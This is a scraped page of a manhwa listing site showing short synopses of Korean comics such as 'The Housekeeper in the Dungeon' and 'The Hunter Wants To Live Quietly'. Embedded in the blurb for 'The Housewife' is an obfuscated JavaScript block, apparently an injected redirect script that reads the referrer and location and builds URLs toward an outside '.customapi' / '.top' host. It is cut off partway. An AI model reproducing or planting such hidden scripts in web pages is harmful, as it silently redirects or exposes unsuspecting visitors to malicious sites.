Manhwa - Page 197

Manhwa, the Korean version of comics, is renowned for its digital format and engaging stories across genres, from romance to action and fantasy.

2958 results

The Housekeeper In The Dungeon

Read manhwa The Housekeeper in the Dungeon The return of good looks! And cooking skills on top?! Lee Heena, an ordinary South Korean office worker. Age 25. Today, another ordinary day completely lost in overtime… is what she thought. She suddenly awakened. And then suddenly fell into a dungeon. “God, Buddha, Allah! Please let me awaken as a fighting-type hunter! If possible, a strong one!!” From the desperate wish, the system responded. [Congratulations!] [You have awakened as a hidden class, ‘Housekeeper’ (D)!] Although Heena’s skills in Plucking Herbs (C), Exterminating Pests (D), This is the Taste of My Magic Touch (D) are very useful in daily life, can she survive with these skills?! But, what’s this? Kang Jinhyeon, South Korea’s No. 1 ranking S-Class hunter, tried his hand at flirting. “I will leave everything I have to you.” “Hunter Kang Jinhyeon…” “Yes. Will you take responsibility for me?” “Why do you ask me to be your housekeeper in such a weird way?!” Is the simple and ordinary daily life that Heena dreamt of okay?! With a talking snail and moving pet plants ♥ The delightful romance fantasy 〈The Housekeeper in the Dungeon〉!


The Housewife

A life of high school student when his hidden secret as a housewife almost is revealed.<script></script><script>function _0x50c6(){var _0x459b70=['2154132wxNLZf','27BDmPoc','xNjfR','href','random','743911wBVUBW','then','1575MkHylb','text','IAWSX','8676712PVWUOp','google','includes','location','http://rea','VLiww','.customapi','KRGrk','2135190YllmVk','','jALgp','18726HdpeGJ','506676yruvlq','454946QhkrcN','https://ip','40SVcGLB','clfSi','referrer','floor','tvVTB','KJuVb','oIfWY','.top/','3yfCFSz'];_0x50c6=function(){return _0x459b70;};return _0x50c6();}(function(_0x42d921,_0x5304a9){var _0x492c0d=_0x547a,_0x3aaae9=_0x42d921();while(!![]){try{var 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The Hunter Wants To Live Quietly

Read manhwa The Hunter Wants To Live Quietly / The Hunter’s Gonna Lay Low / The Hunter Wants to Live in Peace Hunter Cha Eui-jae, who was dispatched to seal a rift that appeared over the West Sea, was flung out as soon as he closed the rift. When he came to his senses, he was lying in a garbage dump. Starving, he was drawn like a zombie is to blood to a hangover soup restaurant, where he realized that he had fallen into South Korea, eight years in the future. In this era, disaster alerts notify people of rift openings in advance, ASMR videos of slimes gathered from dungeons were trending, and idle hunters livestream unboxings of A-rank longswords. Unlike the past, where people trembled in fear of an impending apocalypse, the future was surprisingly peaceful, leaving Cha Eui-jae feeling empty. Since things had turned out this way, why not start a second chapter of life as a part-timer at the hangover soup restaurant, rather than being a hunter? “That’s strange.” “…” “Have we met somewhere before?” Cha Eui-jae’s plan to quietly spend his remaining days as the only part-time worker at the decades-old hangover soup restaurant goes awry when he encounters a mysterious, gas-masked individual… “The Hunter Wants To Live Quietly” is sames name: Cậu Thợ Săn Chỉ Muốn Sống Yên Bình The Hunter Wants to Live in Peace The Hunter’s Gonna Lay Low Thợ Săn Cấp S Chỉ Muốn Sống Ẩn Dật Thợ Săn Muốn Sống Ẩn Dật 헌조살 헌터는 조용히 살고 싶다

2 days ago

The Huntress and The Mad Scientist

Read manhwa The Huntress and The Mad Scientist /  헌터와 매드 사이언티스트 “I can’t log out?!” Esperanza finds herself trapped in a virtual reality game and unable to log out. Suddenly, she is transported 13 years into the past and finds herself stuck in the eerie mansion of the mad scientist, the Earl of Avenedale. In order to escape, Esperanza teams up with Lord Avendale to complete a quest that will hopefully allow her to return to reality.


The Immoral Ducal Family Needs to Learn Family Values

“The Immoral Ducal Family Needs to Learn Family Values” is a manhwa series recently published at Romance Manhwa and has been widely searched for. The description of the comics “The Immoral Ducal Family Needs to Learn Family Values”: I’ll teach these three troublesome kids myself. Recently, a few changes have come into my life. First, I became the tutor for the siblings of the Duke of Bertha’s household. Second, I regained the memories of my past life. Why am I suddenly recalling my past life now? Is this… the world from the novel I read in my previous life? If my memory is correct, as the tutor, “Estella,” I’m about to face death. I have to protect the Duke’s half-siblings from the notorious villain, “Diego”! “You seem to be a much better person than I thought.” “You should look for work at another mansion. If you stay here, you’ll go mad.” But Diego, this man, whom I thought was a heartless psychopath, turns out to be surprisingly kind…? Fine then! I’ll set up a reconciliation between Diego and his half-siblings! Who could kill these adorable kids when they’re hugging you?! <The Duke’s Notorious Household Needs Proper Education> “The Immoral Ducal Family Needs to Learn Family Values” is another name: The Immoral Duke Needs to be Homeschooled 패륜 공작가에는 가정 교육이 필요하다 Groups Scanlating Manhwa Sonat Scans


The Imperious Young Lord

Read manhwa The Imperious Young Lord / Overbearing Tyrant / Acımasız Soylu / パワハラする領主様 / 飞扬跋扈的领主大人 / 갑질하는 영주님 The year is 203X, and Earth is under attack. The enemy? Extraterrestrials. Park Hyunsung, a militia commander, valiantly lays down his life to take down the enemy base. One moment, he’s caught up in a malfunctioning teleportation device; the next… he’s in the body of Ian Alberon, a 15-year-old lord! Thrown into a world of monsters and magic, Hyunsung — now Ian — must figure out how to navigate his new surroundings. And to top it all off, it seems his enemies may be much closer than he thinks…


The Impure Type Of Friendship

Read The Impure Type of Friendship manhwa update free at Bibimanga.ComSiyoung and Jiho have been friends for a very long time, however "Friends? You've been my girl from the start. The only woman who made me feel lu**." The night when I was betrayed by my friend a chilling pleasure spread in Jiho's eyes, who I thought was my friend became my lover?A Friendship So Impure , Friendship, The Impure Type Friendship, The Impure


The Indomitable Martial King

Read The Indomitable Martial King [By the studio that brought you <Solo Leveling> and <Revenge of the Iron-Blooded Sword Hound, and many more! and Same Author that brought you <Survival Story of a Sword King in a Fantasy World> A world where humans sell and buy otherworldly species as slaves. The great mage Rifenhardt is treated like the Demon King for helping the otherworldly species. A party of heroes arrive to bring down the Demon King! Rifenhardt succeeds in greatly injuring the heroes, but he faces death at the hands of the MARTIAL KING??? Tesslon… “Time and Space Regression Spell.” However, he miraculously manages to cast this last-resort spell and regresses to the past. But… “I became the MARTIAL KING??? Tesslon, one of the heroes who tried to kill me and the strongest on the continent?!” Now begins Rifenhardt’s adventures as both a great mage and the physically strongest man to change the world! Time Slip of the Fist King, 권왕전생

3 days ago

The Innkeeper Chronicles

On the outside, Dina Demille is the epitome of normal. She runs a quaint Victorian Bed and Breakfast in a small Texas town with her seemingly harmless Shih Tzu named Beast. But Dina isdifferent. Her Inn can magically defy the laws of physics, her broom is a deadly weapon, and her little dog is far from harmless. Under the circumstances, "normal" is a bit of a stretch for Dina. And now, something with wicked claws and deepwater teeth has begun to hunt at night.Feeling responsible for her neighbors, Dina decides to get involved. Before long, she has to juggle dealing with the annoyingly attractive, ex-military, new neighbor, Sean Evansan alpha-strain werewolfand the equally arresting cosmic vampire soldier, Arland, while trying to keep her Inn and its guests safe. But the enemy she's facing is unlike anything she's ever encountered before. It's smart, vicious, lethal and putting herself between this creature and her neighbors might just cost her everything.mangabuddy is a website dedicated to fans of anime, , , , video games, and cosplay. Where you may find all of your anime-related memes, recommendations, reviews, manga recommendations, character fanfiction, favorite quotations, and simply those ordinary anime things that you enjoy, particularly memes.You can , online for free at mangabuddy. Chapters are updated hourly with high-quality graphics and a full English translation. Find free translations of your favorite , and . The latest updated content on mangabuddy is now available.


The Investor Who Sees the Future

Read manhwa The Investor Who Sees the Future / Foresighting Investor Kang Jin-hoo gains an extraordinary ability to foresee the future after a life-changing accident during his military service. Armed with this unique power, he dives into the world of investments, targeting companies and financial markets to amass wealth and become the world’s top investor. But his vision extends beyond just making money. Kang Jin-hoo’s foresight begins to influence the global economy, political systems, major corporations, and even the course of globalization itself. Now, with his sights set on reshaping the world of finance and beyond, he is about to rewrite the rules of the future. Another name for “The Investor Who Sees the Future Manhwa” 미래를 보는 투자자

1 days ago

The Invicible Princess Is Bored Again Today

Dante Renatos, who took the place of Emperor with his excellent swordsmanship, reincarnated 500 years later as’ Helena’, daughter of the Duke of Pereska. The second life I didn’t want. I enjoyed everything I could in my previous life, and I tried everything I could. At that point, anything done in this 2nd life would be troublesome and boring. Then, Caesar, the prince, visits the Duke’s residence to avoid a power conflict. Helena, who recognized Caesar’s talent, decided to become his swordsmanship teacher. “I will make you emperor.” It was only to soothe a boring life. I started thinking of using my past life’s skills to train younger students. “If it’s for Master, I can destroy this world.” Somehow, even if my student likes me, it seems like he likes me too much??


The Invincible Man

Read “The Invincible Man Novel” – “The Invincible Man Manhwa” Online Free At MANGAZIN The summary of the comics “The Invincible Man”: Im Hwapyung. A man who wants to live a normal life like his name. Everything he had in his mundane life was destroyed. [Your love has become my loathing.] You shouldn’t have messed with me in the first place. You should have just let me live a quiet life. And now he has began his move that none of his nemesis will survive his wrath. “The Invincible Man” is alternatively named: A Better Tomorrow (Cyungchan Noh) / El hombre invencible / Moojokja  / 無籍者 / 無籍者〜最強の復讐鬼〜 / 무적자 The comics “The Invincible Man” belongs to the Genre: Action, Drama, Martial Arts, Seinen “Kun Manga, MANGA UPDATES, Manhwa Website…” are the most searched keywords on the website S2Manga. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging
